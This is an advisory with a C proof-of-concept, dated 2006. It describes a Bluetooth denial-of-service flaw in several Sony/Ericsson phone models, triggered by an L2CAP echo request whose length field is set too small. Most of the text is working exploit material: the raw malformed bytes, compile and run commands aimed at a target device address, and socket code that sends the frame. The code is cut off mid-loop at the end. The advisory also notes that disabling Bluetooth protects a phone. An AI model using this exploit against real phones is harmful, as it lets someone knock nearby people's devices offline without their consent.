Sony/Ericsson L2CAP Length Field DoS Author: Pierre Betouin (pierre.betouin@infratech.fr) : None Certain models of Sony/Ericsson phones are vulnerable to a DoS attack involving L2CAP frames with invalid header lengths. Phone models known to be affected are: - Sony/Ericsson K600i - Sony/Ericsson V600i - Sony/Ericsson K750i - Sony/Ericsson W800i By sending a malformed L2CAP frame to certain models of Sony/Ericsson phones it is possible to cause the device to lock-up. This is done by creating an L2CAP frame with an improperly set length field. For instance, it is possible to send an L2CAP echo frame to the device which is 4 bytes in length but set the length field in the frame to 1 byte. When an affected device receives the frame its screen will either go blank or the device will halt. A short raw L2CAP packet such as : 08 01 01 00 It represents the following L2CAP header fields : code L2CAP_ECHO_REQ; ident 1 length 1 The "real" packet sent is, in fact, 4 bytes long. The DoS can be triggered when the length sent in the L2CAP field is equal to the real length minus 3 (which is the size of the L2CAP header here). In addition, other Sony/Ericsson models may be affected. Currently a fix for this issue is unavailable. To protect yourself from this issue disable the affected device's Bluetooth functionality. /* Sony/Ericsson reset display - PoC */ /* Pierre BETOUIN - pierre.betouin@infratech.fr */ /* 05-02-2006 */ /* Vulnerability found using BSS fuzzer : */ /* Download www.secuobs.com/news/05022006-bluetooth10.shml */ /* */ /* Causes anormal behaviours on some Sony/Ericsson */ /* cell phones */ /* Vulnerable tested devices : */ /* - K600i */ /* - V600i */ /* - K750i */ /* - W800i */ /* - And maybe other ones... */ /* */ /* Vulnerable devices will slowly turn their screen into */ /* black and then display a white screen. */ /* After a short period (~45sec), they will go back to */ /* their normal behaviour */ /* */ /* gcc -lbluetooth reset_display_sonyericsson.c */ /* -o reset_display_sonyericsson */ /* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ #include #include #include #include #include #include #include #include #define SIZE 4 #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) int main(int argc, char **argv) { char *buffer; l2cap_cmd_hdr *cmd; struct sockaddr_l2 addr; int sock, sent, i; if(argc < 2) { fprintf(stderr, "%s \n", argv[0]); exit(EXIT_FAILURE); } if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("socket"); exit(EXIT_FAILURE); } memset(&addr, 0, sizeof(addr)); addr.l2_family = AF_BLUETOOTH; if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(EXIT_FAILURE); } str2ba(argv[1], &addr.l2_bdaddr); if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("connect"); exit(EXIT_FAILURE); } if(!(buffer = (char *) malloc ((int) SIZE + 1))) { perror("malloc"); exit(EXIT_FAILURE); } memset(buffer, 90, SIZE); cmd = (l2cap_cmd_hdr *) buffer; cmd->code = L2CAP_ECHO_REQ; cmd->ident = 1; cmd->len = FAKE_SIZE; if( (sent=send(sock, buffer, SIZE, 0)) >= 0) { printf("L2CAP packet sent (%d)\n", sent); } printf("Buffer:\t"); for(i=0; i